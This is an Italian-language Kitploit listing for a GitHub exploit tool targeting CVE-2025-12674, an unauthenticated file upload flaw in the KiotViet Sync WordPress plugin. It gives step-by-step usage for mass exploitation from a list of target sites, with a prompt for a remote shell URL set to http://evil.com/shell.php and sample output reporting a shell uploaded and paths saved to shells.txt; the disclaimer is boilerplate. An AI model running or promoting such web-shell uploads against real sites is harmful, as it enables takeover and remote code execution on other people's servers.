Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-12674 — KiotViet Sync <= 1.8.5 - Caricamento File Arbitrario Non Autenticato | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-12674
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubnxploited/cve-2025-12674

CVE-2025-12674

KiotViet Sync <= 1.8.5 - Caricamento File Arbitrario Non Autenticato

Vedi Repository
217 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-12674

KiotViet Sync <= 1.8.5 - Caricamento Arbitrario di File Non Autenticato

🐚 KiotViet Sync <= 1.8.5 - Caricamento Arbitrario di File Non Autenticato


📝 Descrizione

Il plugin KiotViet Sync per WordPress (versioni fino a 1.8.5 incluse) è vulnerabile al caricamento arbitrario di file, a causa della mancata validazione del tipo di file nella funzione create_media().
Questa vulnerabilità consente a attaccanti non autenticati di caricare file arbitrari sul server, il che può portare a esecuzione di codice remoto.

  • CVE: CVE-2025-12674
  • CVSS: 9.8 (Critico)

🚀 Utilizzo

  1. Clona questo repository o scarica lo script.

  2. Prepara i tuoi target:
    Metti un target per riga in un file chiamato list.txt.

    root@kitploit:~
    example.com
    site2.com
    http://site3.com
    
  3. Esegui lo script di exploit:
    Il nome dello script è:

    root@kitploit:~
    CVE-2025-12674.py
    
    root@kitploit:~
    python3 CVE-2025-12674.py
    
  4. Quando richiesto, inserisci le tue opzioni:

    root@kitploit:~
    Enter targets file name (default: list.txt): list.txt
    Enter number of threads (default: 10): 
    Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ Loaded 1 targets. Threads: 10.                                                                                           │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ http://nxk.ddev.site                                                                                                     │
    │ Trying KiotViet exploit...                                                                                               │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
    ║ ✔ Shell uploaded!                                                                                                        ║
    ║ Check here:                                                                                                              ║
    ║ http://nxk.ddev.site/wp-content/uploads/2026/01/                                                                         ║
    ║                                                                                                                          ║
    ╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
               Summary           
                                 
      Metric              Value  
     ─────────────────────────── 
      Total attempts          1  
      Successful shells       1  
      Failed attempts         0  
    
  • La directory di output per la shell caricata non mostra il nome del file (poiché viene generato dinamicamente).

📂 Output

  • Tutti i percorsi delle shell riuscite vengono salvati in shells.txt.
  • Copie di backup dell'output vengono create automaticamente con timestamp.

⚠️ Disclaimer

Questo script è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.
L'uso non autorizzato contro sistemi di cui non si possiede o non si ha il permesso esplicito di testare è illegale e non etico.
L'autore non si assume alcuna responsabilità per uso improprio o per eventuali danni causati.


👤 Autore

Nxploited (Khaled Alenazi)

Scarica lo strumento